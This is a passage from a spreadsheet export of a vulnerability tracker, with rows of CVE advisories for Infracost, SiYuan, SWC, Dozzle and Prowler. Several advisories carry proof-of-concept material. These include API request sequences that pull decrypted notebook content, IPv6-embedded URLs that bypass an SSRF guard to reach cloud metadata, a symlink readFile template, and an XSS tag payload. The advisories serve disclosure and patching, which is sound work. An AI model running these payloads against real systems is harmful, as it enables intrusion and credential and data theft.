The issue is best described as a filesystem sandbox bypass caused by improper link resolution before file access.</t></is></c><c r="T1582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="1583"><c r="A1583" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1583" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D1583" s="5" t="inlineStr" /><c r="E1583" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1583" s="5" t="inlineStr" /><c r="H1583" s="5" t="n"><v>0.004</v></c><c r="I1583" s="5" t="inlineStr" /><c r="J1583" s="5" t="inlineStr" /><c r="K1583" s="5" t="inlineStr" /><c r="L1583" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1583" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1583" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1583" s="5" t="inlineStr" /><c r="R1583" s="5" t="inlineStr" /><c r="S1583" s="5" t="inlineStr"><is><t>### Impact

Path traversal via link following in the Infracost config-template parser. The `readFile`, `pathExists`, `isDir`, and `matchPaths` template functions confined repo-supplied paths with a lexical `filepath.Rel` check plus a leaf-only `os.Lstat`:

```
{{ readFile "evil/file" }}
```

With an intermediate directory symlink committed in the repo (`evil -&gt; /`), the path is lexically clean and the leaf is a regular file, so both checks pass, but `os.ReadFile` follows the symlink and reads outside the checkout. The contents are rendered into the generated config and surfaced via the Infracost dashboard and PR comment, so anyone who can open a pull request can read files off the runner.

Affects `infracost` up to and including `v0.10.44`. Successful exploitation reads any file the CLI process can reach on the runner. Impact depends on what the run exposes: under `on: pull_request` (the configuration in Infracost's documentation) fork pull requests run without secrets and with a read-only token, so exposure is limited. If Infracost runs under `pull_request_target`, or is triggered by a same-repository pull request, the read reaches the repository's secrets, enabling secret theft. The patch confines all four functions regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3586](https://github.com/infracost/infracost/pull/3586)) by routing all four functions through `security.IsPathAllowed`, which resolves symlinks anywhere in the path before a segment-aware containment check. The same fix landed in [config#14](https://github.com/infracost/config/pull/14) and [parser#144](https://github.com/infracost/parser/pull/144).
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: run Infracost under `on: pull_request` rather than `pull_request_target`, and keep fork pull requests from receiving secrets (the defaults).</t></is></c><c r="T1583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="1584"><c r="A1584" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1584" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D1584" s="5" t="inlineStr" /><c r="E1584" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1584" s="5" t="inlineStr" /><c r="H1584" s="5" t="n"><v>0.004</v></c><c r="I1584" s="5" t="inlineStr" /><c r="J1584" s="5" t="inlineStr" /><c r="K1584" s="5" t="inlineStr" /><c r="L1584" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1584" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1584" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1584" s="5" t="inlineStr" /><c r="R1584" s="5" t="inlineStr" /><c r="S1584" s="5" t="inlineStr"><is><t>### Impact

Sensitive information exposure in the Infracost Terraform Cloud/Enterprise integration. Several code paths attached a configured secret token to a request whose host was taken straight from the scanned Terraform, with no check that the host was the trusted endpoint. 

The condition that matters is whether a Terraform Cloud/Enterprise (or registry) token is present in the run: if one is, the injected hostname can disclose it. Impact therefore depends on the trigger. Under `on: pull_request` (the only configuration in Infracost's documentation) fork pull requests run without secrets, so no token is present. It only reaches token disclosure under `pull_request_target`, a same-repository pull request, or another CI setup that provides the token alongside untrusted Terraform, and exploiting an untrusted fork pull request also typically needs a maintainer to approve the workflow run. The patch scopes the token to the trusted host regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3590](https://github.com/infracost/infracost/pull/3590)) by attaching a token only when the destination host matches the configured trusted host; otherwise Infracost refuses to send it and skips remote variable loading
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: use `on: pull_request` rather than `pull_request_target`, pin `organization`, `workspace`, and `host` in Infracost config so the `.tf` hostname is ignored, and keep Terraform Cloud and registry tokens out of runs that process untrusted pull request content.</t></is></c><c r="T1584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="1585"><c r="A1585" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1585" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D1585" s="5" t="inlineStr" /><c r="E1585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1585" s="5" t="inlineStr" /><c r="H1585" s="5" t="n"><v>0.003</v></c><c r="I1585" s="5" t="inlineStr" /><c r="J1585" s="5" t="inlineStr" /><c r="K1585" s="5" t="inlineStr" /><c r="L1585" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1585" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1585" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1585" s="5" t="inlineStr" /><c r="R1585" s="5" t="inlineStr" /><c r="S1585" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72789](https://nvd.nist.gov/vuln/detail/CVE-2026-72789).

### Summary

`publishAccess.json` is an opt-out list. The publish gate returns *accessible* for anything not explicitly listed in it. Encrypted notebooks are never written into that file, because only the administrator-gated `setPublishAccess` writes it and no part of the encryption subsystem does. Consequently every encrypted notebook is publish-accessible as far as the gate is concerned.

While an encrypted notebook is unlocked, an anonymous reader in publish mode can list it, enumerate its documents, and retrieve their fully decrypted content. No key material, no password, and no cracking is involved. The kernel decrypts the data and serves it because the authorization layer never asks whether the notebook is encrypted.

This is reported as a defect in the gate rather than in any individual handler. Endpoints that were previously reviewed and found to apply the correct checks do apply them. The checks return true.

### Details

**The gate defaults to accessible.** `CheckPathAccessableByPublishIgnore(box, path, ignore)` iterates the ignore list and returns false only on a match:

```go
for _, item := range publishIgnore {
    if item.ID == box || strings.Contains(path, item.ID) {
        return false
    }
}
return true   // unlisted means accessible
```

**Encrypted notebooks are never listed.** `publishAccess.json` is written only by `setPublishAccess` (`kernel/api/router.go:169`), which carries `CheckAdminRole` and `CheckReadonly`. Nothing in `crypto.go`, `encrypted_ops.go` or `notebook_crypto.go` writes to it. An administrator would have to manually add each encrypted notebook to the ignore list to protect it, and nothing in the product prompts or documents that.

**Neither core gate rejects them.** On both `eef105683` and `v3.7.4-alpha.1`:

```go
func checkBlockTreeAccessableByPublishAccess(...) bool {
    return CheckPathAccessableByPublishIgnore(bt.BoxID, bt.Path, publishIgnore) &amp;&amp;
           (password == "" || CheckPublishAuthCookie(c, passwordID, password))
}
```

For an encrypted notebook the first term is true because it is unlisted, and the second is true because encrypted notebooks carry no publish password. The conjunction returns true.

`IsEncryptedBox` does not appear in `kernel/model/publish_access.go` at all on master. On the development branch it appears once, inside `parseAttributeViewForPublishAccess`, where it routes *into* encrypted boxes rather than excluding them. The publish authorization layer has no concept of an encrypted notebook.

**The chain.** Verified on the development branch, which is the harder target because the block-metadata, attribute-view, path-resolution and encrypted-notebook-status fixes have all landed there.

1. `lsNotebooks` calls `ListNotebooks()`, which includes encrypted notebooks and reports `Encrypted: boxConf.Encrypted` without filtering on it. The reader filter skips only notebooks that are `Closed` or publish-invisible. An unlocked encrypted notebook is neither, so it is returned to an anonymous reader together with its identifier.
2. `listDocsByPath{notebook: &lt;encrypted box id&gt;, path: "/"}` applies only `CheckPathAccessableByPublishIgnore`, which passes, returning the document identifiers and titles inside the encrypted notebook.
3. `getDoc` routes to `GetDocInBox(...)`, after which `FilterContentByPublishAccess(...)` returns the content unmodified because the box is unlisted. The response is the fully decrypted document. `getBlockKramdown` reaches `GetBlockKramdownInBox` for the same result in Markdown.

Handlers reach the decrypted store through `encryptedNotebookFromArg(arg)` on a client-supplied notebook argument. This function predates the current release and is not a recent addition.

**The precondition is the unlock window.** `GetBlockTreeInBox` returns nil while a notebook is locked, treating it as nonexistent, and non-nil once unlocked. So the exposure is bounded to the period during which the legitimate user has the notebook open, which is precisely the period in which they are working in it. No action by the attacker triggers or extends that window, but no unusual condition is required either.

**On endpoints previously assessed as correctly gated.** `getBlockDOM` and `getBlockKramdown` apply password and visibility checks. `exportPreview` applies `FilterContentByPublishAccess`. Those assessments are accurate and this report does not contradict them. The checks execute and return true, because the visibility term resolves to accessible for an unlisted box and the password term is vacuous for a notebook that has no publish password. Patching any individual handler would not change that result.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. An encrypted notebook that is currently unlocked by the legitimate user.

Step 1, obtain the encrypted notebook's identifier:

```
POST http://127.0.0.1:6808/api/notebook/lsNotebooks
{}

→ 200. The list includes the encrypted notebook, with encrypted: true and its id.
```

Step 2, enumerate its documents:

```
POST http://127.0.0.1:6808/api/filetree/listDocsByPath
{"notebook":"&lt;encrypted box id&gt;","path":"/"}

→ 200, document identifiers and titles from inside the encrypted notebook
```

Step 3, retrieve decrypted content:

```
POST http://127.0.0.1:6808/api/filetree/getDoc
{"id":"&lt;document id from step 2&gt;"}

→ 200, the fully decrypted document
```

`getBlockKramdown` returns the same content as decrypted Markdown. Repeating step 3 while the notebook is locked returns not-found, which confirms the unlock window is the only thing standing between an anonymous reader and the plaintext.

### Impact

The confidentiality guarantee of the encrypted-notebook feature is defeated against a remote, unauthenticated attacker for as long as the notebook is unlocked. A user who encrypts a notebook is expressing that its contents should be protected beyond the ordinary publish boundary. The publish gate does not recognise that intent, and instead treats the notebook as publicly readable because nobody added it to an opt-out list that the encryption feature does not write to.

The exposure is full document content rather than metadata, and it applies to every document in the notebook. It requires no key material, no password, no offline work and no interaction with the encryption subsystem at all.

### Suggested fix

Fail closed on encryption, independently of `publishAccess.json`:

```go
if IsEncryptedBox(bt.BoxID) {
    return false
}
```

in both `checkBlockTreeAccessableByPublishAccess` and `CheckBlockTreeMetadataAccessableByPublishAccess`, and exclude encrypted notebooks from `lsNotebooks` and `listDocsByPath` for read-only roles.

The broader point is the default. An opt-out authorization list means every future notebook type, storage backend or content class is publicly accessible until somebody remembers to add it. Encrypted notebooks are the case where that default is most clearly wrong, but they are unlikely to be the only one.</t></is></c><c r="T1585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="1586"><c r="A1586" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1586" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D1586" s="5" t="inlineStr" /><c r="E1586" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1586" s="5" t="inlineStr" /><c r="H1586" s="5" t="n"><v>0.002</v></c><c r="I1586" s="5" t="inlineStr" /><c r="J1586" s="5" t="inlineStr" /><c r="K1586" s="5" t="inlineStr" /><c r="L1586" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1586" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1586" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1586" s="5" t="inlineStr" /><c r="R1586" s="5" t="inlineStr" /><c r="S1586" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72790](https://nvd.nist.gov/vuln/detail/CVE-2026-72790).

### Relationship to GHSA-8x84-r2ff-h8pq (please read first)

`getNotebookInfo` is named in the earlier advisory GHSA-8x84-r2ff-h8pq, in its remediation section, which asked for reader filtering on both `getNotebookConf` and `getNotebookInfo`. Commit `3bc014c7d` applied that filtering to `getNotebookConf` only.

That advisory grouped `getNotebookInfo` under `BoxCrypt`, and `getNotebookInfo` never returns `BoxCrypt`. Anyone checking the handler for key material would correctly find none and move on. This report corrects that characterisation and states what the handler actually discloses, which is notebook metadata rather than key material. If you would prefer this tracked as a follow-up on the original advisory rather than separately, that is entirely reasonable.

### Summary

`/api/notebook/getNotebookInfo` is registered with `CheckAuth` only and applies no authorization check of any kind. Given a notebook identifier, it returns that notebook's author-written name, document count, total size and creation and modification timestamps. It does so for every notebook the server has loaded, including notebooks that `lsNotebooks` deliberately withholds from readers because they are closed or not publish-visible.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:123` `POST /api/notebook/getNotebookInfo` → `model.CheckAuth` → `getNotebookInfo` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. `IsReadOnlyRoleContext`, `publishAccess`, `Visible` and `Closed` all return zero matches |
| Exposed | `BoxInfo{ID, Name, DocCount, Size, HSize, Mtime, CTime, HMtime, HCtime}` |
| Affected refs | `eef105683` (v3.7.3, master HEAD) and `v3.7.4-alpha.1`, handler identical on both |

**The handler.** It validates `boxID` against the ID pattern, calls `box := model.Conf.Box(boxID)`, returns a not-found response if that is nil, and otherwise returns `box.GetInfo()` unmodified. `GetInfo()` (`kernel/model/box.go:470`) walks the notebook's files and returns the metadata listed above. There is no ownership check and no publish-access check anywhere on the path.

The nil branch is also a minor existence oracle: a valid-format identifier that names no loaded notebook is distinguishable from one that does.

**Guarded sibling.** `lsNotebooks`, the notebook lister, is also reader-reachable and does filter. For read-only roles it skips any notebook where `notebook.Closed` holds, and skips any notebook whose publish-access entry has `!item.Visible`. The codebase therefore intends closed and non-published notebooks to be invisible to readers. `getNotebookInfo` returns their name and statistics to any reader who supplies the identifier.

**Precedent.** GHSA-f2rw-w22v-54vh restricted `getEncryptedNotebookStatus`, which disclosed encrypted-notebook names and lock state, to administrators. `getNotebookInfo` is the non-encrypted analogue, disclosing regular notebook names and statistics including for notebooks outside the reader's publish scope, and was not restricted.

**Reachability, stated precisely, because it differs by branch.**

On v3.7.3 a reader can obtain the identifier of a notebook they cannot see, by chaining two endpoints that are currently ungated on that branch. `getBlockDefIDsByRefText` returns block and document identifiers workspace-wide, including from hidden notebooks. `getPathByID` then returns the owning notebook identifier for any such block, in its `notebook` field. `getFullHPathByID` additionally discloses the notebook name directly. The chain requires no special conditions beyond a reference text that occurs somewhere in the workspace.

On the development branch those sources are already closed. `getPathByID` now gates through `CheckBlockIdMetadataAccessableByPublishAccessInBox`, `getIDsByHPath` through `filterFileTreeBlockIDsByPublishDiscoverability`, and `getBlockDefIDsByRefText` and `getFullHPathByID` are likewise gated. Notebook identifiers are a fourteen-digit timestamp plus seven random characters, and `Conf.Box(boxID)` returns non-nil only for loaded notebooks, so guessing is not practical. A reader-reachable route on the development branch that yields the identifier of a hidden notebook was not found.

So on the development branch this is defence in depth rather than a live path. It is reported because the handler itself remains unguarded on both branches, and because closing it removes any dependence on those identifier sources staying gated in future.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A notebook that is closed or not publish-visible. Steps 1 and 2 apply to v3.7.3; on the development branch, start at step 3 with a known identifier.

Step 1, obtain block identifiers workspace-wide:

```
POST http://127.0.0.1:6808/api/block/getBlockDefIDsByRefText
{"anchor":"&lt;a word likely to occur anywhere in the workspace&gt;"}

→ 200, block and document identifiers including ones inside hidden notebooks
```

Step 2, resolve one to its owning notebook:

```
POST http://127.0.0.1:6808/api/filetree/getPathByID
{"id":"&lt;identifier from step 1&gt;"}

→ 200, the notebook field carries the hidden notebook's boxID
```

Step 3, read the notebook's metadata:

```
POST http://127.0.0.1:6808/api/notebook/getNotebookInfo
{"notebook":"&lt;boxID from step 2&gt;"}

→ 200, returns name, docCount, size, hSize, mtime, ctime, hMtime, hCtime
   for a notebook that lsNotebooks does not return to this same session
```

The differential is the point: call `lsNotebooks` with the same session and confirm the notebook is absent from the list, then call `getNotebookInfo` and receive its name and statistics.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can read the author-written name, document count, total size and activity timestamps of notebooks that are closed or not published, which are exactly the notebooks the notebook lister withholds from them. Notebook names are free text chosen by the author and routinely describe their contents. Document count and size indicate scale, and the modification timestamp reveals recent activity in a workspace area the reader has no access to. Confidentiality only, with no integrity or availability impact, and no document content is disclosed.

### Suggested fix

Apply the same filtering `lsNotebooks` already performs. When `IsReadOnlyRoleContext(c)` holds, return the not-found response unless the notebook is publish-visible and not closed, before calling `GetInfo()`. This is the reader filtering the earlier advisory's remediation section requested for this handler.</t></is></c><c r="T1586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="1587"><c r="A1587" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1587" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D1587" s="5" t="inlineStr" /><c r="E1587" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1587" s="5" t="inlineStr" /><c r="H1587" s="5" t="n"><v>0.002</v></c><c r="I1587" s="5" t="inlineStr" /><c r="J1587" s="5" t="inlineStr" /><c r="K1587" s="5" t="inlineStr" /><c r="L1587" s="5" t="inlineStr"><is><t>crates.io:swc_html_minifier, npm:@swc/html</t></is></c><c r="M1587" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1587" s="5" t="inlineStr" /><c r="R1587" s="5" t="inlineStr" /><c r="S1587" s="5" t="inlineStr"><is><t>## Impact

`@swc/html` minifies JSON contained in `script` elements such as
`application/json` and `application/ld+json` by parsing and serializing the
JSON value.

Before the patched versions, JSON serialization could convert escaped
less-than signs such as `\u003C` into literal `&lt;` characters. If the JSON
contained an escaped `&lt;/script&gt;` sequence, the generated HTML could terminate
the containing script element early because HTML tokenization occurs before
the JSON is consumed.

Applications that minify HTML containing attacker-controlled JSON data could
therefore transform inert data into active markup. A crafted payload could
execute script in the origin of the generated page.

## Patches

The issue is fixed in:

- `@swc/html` 1.15.47
- `swc_html_minifier` 59.0.0

The minifier now re-escapes less-than signs after JSON serialization, preserving
the script element boundary.

## Workarounds

Users who cannot upgrade can disable JSON minification with:

```js
await minify(html, {
  minifyJson: false,
});</t></is></c><c r="T1587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="1588"><c r="A1588" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1588" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D1588" s="5" t="inlineStr" /><c r="E1588" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1588" s="5" t="inlineStr" /><c r="H1588" s="5" t="n"><v>0.003</v></c><c r="I1588" s="5" t="inlineStr" /><c r="J1588" s="5" t="inlineStr" /><c r="K1588" s="5" t="inlineStr" /><c r="L1588" s="5" t="inlineStr"><is><t>Go:github.com/amir20/dozzle</t></is></c><c r="M1588" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1588" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1588" s="5" t="inlineStr" /><c r="R1588" s="5" t="inlineStr" /><c r="S1588" s="5" t="inlineStr"><is><t>## Summary

The `isBlockedIP` SSRF guard in Dozzle's webhook notification dispatcher blocks loopback, link-local, multicast, and unspecified addresses but does not recognize IPv6 transition mechanism addresses (RFC 3056 6to4, RFC 6052 NAT64, RFC 4380 Teredo) that embed arbitrary IPv4 addresses. An authenticated user can bypass the guard to reach loopback services, cloud metadata endpoints (169.254.169.254), and other blocked ranges via webhook notification URLs.

## Affected component / versions

- Package: `github.com/amir20/dozzle`
- Affected versions: all versions with SSRF guard (current HEAD [`b9df313`](https://github.com/amir20/dozzle/commit/b9df31356fc024e6768a1aac605844dc041d95ee))
- Vulnerable code: `internal/notification/dispatcher/webhook.go`

## Details

### Root cause (CWE-918)

[`internal/notification/dispatcher/webhook.go:32-51`](https://github.com/amir20/dozzle/blob/b9df31356fc024e6768a1aac605844dc041d95ee/internal/notification/dispatcher/webhook.go#L32-L51):

```go
func isBlockedIP(ip net.IP) bool {
	if ip.IsLoopback() ||
		ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() ||
		ip.IsInterfaceLocalMulticast() ||
		ip.IsUnspecified() {
		return true
	}
	if v4 := ip.To4(); v4 != nil &amp;&amp; zeroNetV4.Contains(v4) {
		return true
	}
	if ip.Equal(net.IPv4bcast) {
		return true
	}
	return false
}
```

The guard intentionally allows RFC 1918 private ranges for self-hosted webhook targets, but blocks loopback (127.0.0.0/8, ::1), link-local (169.254.0.0/16, fe80::/10), and other non-routable addresses. IPv6 transition mechanism addresses bypass all these checks:

| Mechanism | Prefix | Embeds | `isBlockedIP` result |
|-----------|--------|--------|---------------------|
| 6to4 | `2002::/16` | any IPv4 in bits 16-47 | `false` |
| NAT64 WKP | `64:ff9b::/96` | any IPv4 in bits 96-127 | `false` |
| Teredo | `2001:0000::/32` | any IPv4 in bits 96-127 | `false` |

### Reachability / trust boundary

The `safeDialContext` function (line 53) resolves hostnames and checks each IP against `isBlockedIP` before establishing a TCP connection. This is used as the `DialContext` for the webhook HTTP client (line 115).

Webhook URLs are configured by authenticated Dozzle users through the notification settings UI. The guard exists to prevent authenticated users from using webhook delivery as a proxy to reach the host machine's loopback services or cloud metadata endpoint.

### Attack chain

1. Authenticated user creates a webhook notification with URL `http://[2002:7f00:0001::1]:8080/` (6to4 embedding 127.0.0.1)
2. When a notification triggers, Dozzle's webhook dispatcher calls `safeDialContext`
3. The IPv6 address `2002:7f00:0001::1` is checked against `isBlockedIP` -- all predicates return false
4. Connection proceeds to the 6to4 relay which routes to 127.0.0.1
5. The webhook POST reaches the host's loopback services

## Impact

An authenticated user can bypass the SSRF guard to:

- Reach cloud metadata service at 169.254.169.254 via `2002:a9fe:a9fe::1` (6to4) to steal instance credentials
- Reach localhost services via `64:ff9b::7f00:1` (NAT64) or `2002:7f00:0001::1` (6to4)
- The webhook response body is logged at debug level but not returned to the user, making this a semi-blind SSRF (status code is returned)

Note: RFC 1918 private ranges are intentionally allowed by the guard. This bypass specifically targets the blocked ranges (loopback and link-local/metadata) that the guard explicitly intends to prevent.

## Proof of concept

Bypass vectors:

```
# 6to4 embedding 127.0.0.1 (bypasses IsLoopback)
http://[2002:7f00:0001::1]:8080/

# NAT64 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[64:ff9b::a9fe:a9fe]/latest/meta-data/

# 6to4 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[2002:a9fe:a9fe::1]/latest/meta-data/

# Teredo embedding 127.0.0.1
http://[2001:0000:dead:beef:0000:0000:7f00:0001]:8080/
```

Verification that `isBlockedIP` returns false for all vectors:

```go
package main

import (
    "fmt"
    "net"
)

func isBlockedIP(ip net.IP) bool {
    return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
        ip.IsMulticast() || ip.IsInterfaceLocalMulticast() || ip.IsUnspecified()
}

func main() {
    for _, v := range []string{
        "2002:7f00:0001::1",    // 6to4 -&gt; 127.0.0.1
        "64:ff9b::a9fe:a9fe",   // NAT64 -&gt; 169.254.169.254
        "2002:a9fe:a9fe::1",    // 6to4 -&gt; 169.254.169.254
    } {
        ip := net.ParseIP(v)
        fmt.Printf("%-35s blocked=%v\n", v, isBlockedIP(ip))
    }
}
// Output: all false
```

## Remediation

Add IPv6 transition mechanism prefix checks to `isBlockedIP`:

```go
func isBlockedIP(ip net.IP) bool {
	// ... existing checks ...

	// IPv6 transition mechanisms embedding arbitrary IPv4
	if len(ip) == net.IPv6len {
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x02 { return true } // 6to4
		if ip[0] == 0x00 &amp;&amp; ip[1] == 0x64 &amp;&amp; ip[2] == 0xff &amp;&amp; ip[3] == 0x9b { return true } // NAT64
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x01 &amp;&amp; ip[2] == 0x00 &amp;&amp; ip[3] == 0x00 { return true } // Teredo
	}
	return false
}
```

## Credit

Reported by tonghuaroot (tonghuaroot@gmail.com).</t></is></c><c r="T1588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="1589"><c r="A1589" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1589" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D1589" s="5" t="inlineStr" /><c r="E1589" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1589" s="5" t="inlineStr" /><c r="H1589" s="5" t="n"><v>0.002</v></c><c r="I1589" s="5" t="inlineStr" /><c r="J1589" s="5" t="inlineStr" /><c r="K1589" s="5" t="inlineStr" /><c r="L1589" s="5" t="inlineStr"><is><t>PyPI:prowler, PyPI:prowler-cloud</t></is></c><c r="M1589" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1589" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1589" s="5" t="inlineStr" /><c r="R1589" s="5" t="inlineStr" /><c r="S1589" s="5" t="inlineStr"><is><t>## Summary

Prowler's HTML output formatter inserts `finding.resource_tags` into the generated report without HTML escaping. A cloud principal who can create or edit a resource tag in an account that is later scanned can store HTML or JavaScript in that tag. When another user opens the generated Prowler HTML report, the payload executes in the report page.

## Impact

This is stored cross-site scripting in a security report artifact. The attacker needs permission to influence tags on a scanned cloud resource, and the victim must open the generated HTML report. In that context, JavaScript can read and modify the report DOM, alter displayed findings, and interact with any same-origin local or hosted report content available to the browser. This can undermine trust in generated security findings and can expose data contained in the report page.

## Gate checks

The repository has 13,875 GitHub stars, which is above the 10,000 star floor. `SECURITY.md` is present and does not reject GitHub private reporting. The dedicated GitHub private vulnerability reporting endpoint for `prowler-cloud/prowler` returned `true`.

## Affected versions

The vulnerable sink is present in current `master` at commit `329dfdf8e6cb8bc0424fb54b6595408e20969782` and in the latest GitHub release tag `5.28.0`. The package metadata identifies the Python package as `prowler`.

## Technical details

The HTML formatter builds each finding row with an f-string in `prowler/lib/outputs/html/html.py`. Neighboring fields are explicitly escaped:

- `resource_uid` is escaped at line 85 with `.replace("&lt;", "&amp;lt;").replace("&gt;", "&amp;gt;")`.
- `status_extended` is escaped at line 87 with the same pattern.

The tag column does not apply equivalent escaping:

```python
&lt;td&gt;{parse_html_string(unroll_dict(finding.resource_tags))}&lt;/td&gt;
```

`unroll_dict` concatenates tag keys and values into a string, and `parse_html_string` only prefixes each item with an HTML bullet. Neither function escapes `&lt;`, `&gt;`, quotes, or event-handler attributes before insertion into the table cell. As a result, a tag value such as this remains active markup in the generated report:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

## Reproduction

1. Create or identify a cloud resource that Prowler will include in an HTML report.
2. Add a tag value containing a harmless proof payload, for example:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

3. Run Prowler against the account and generate HTML output.
4. Open the generated HTML report in a browser.
5. The payload executes from the tags column.

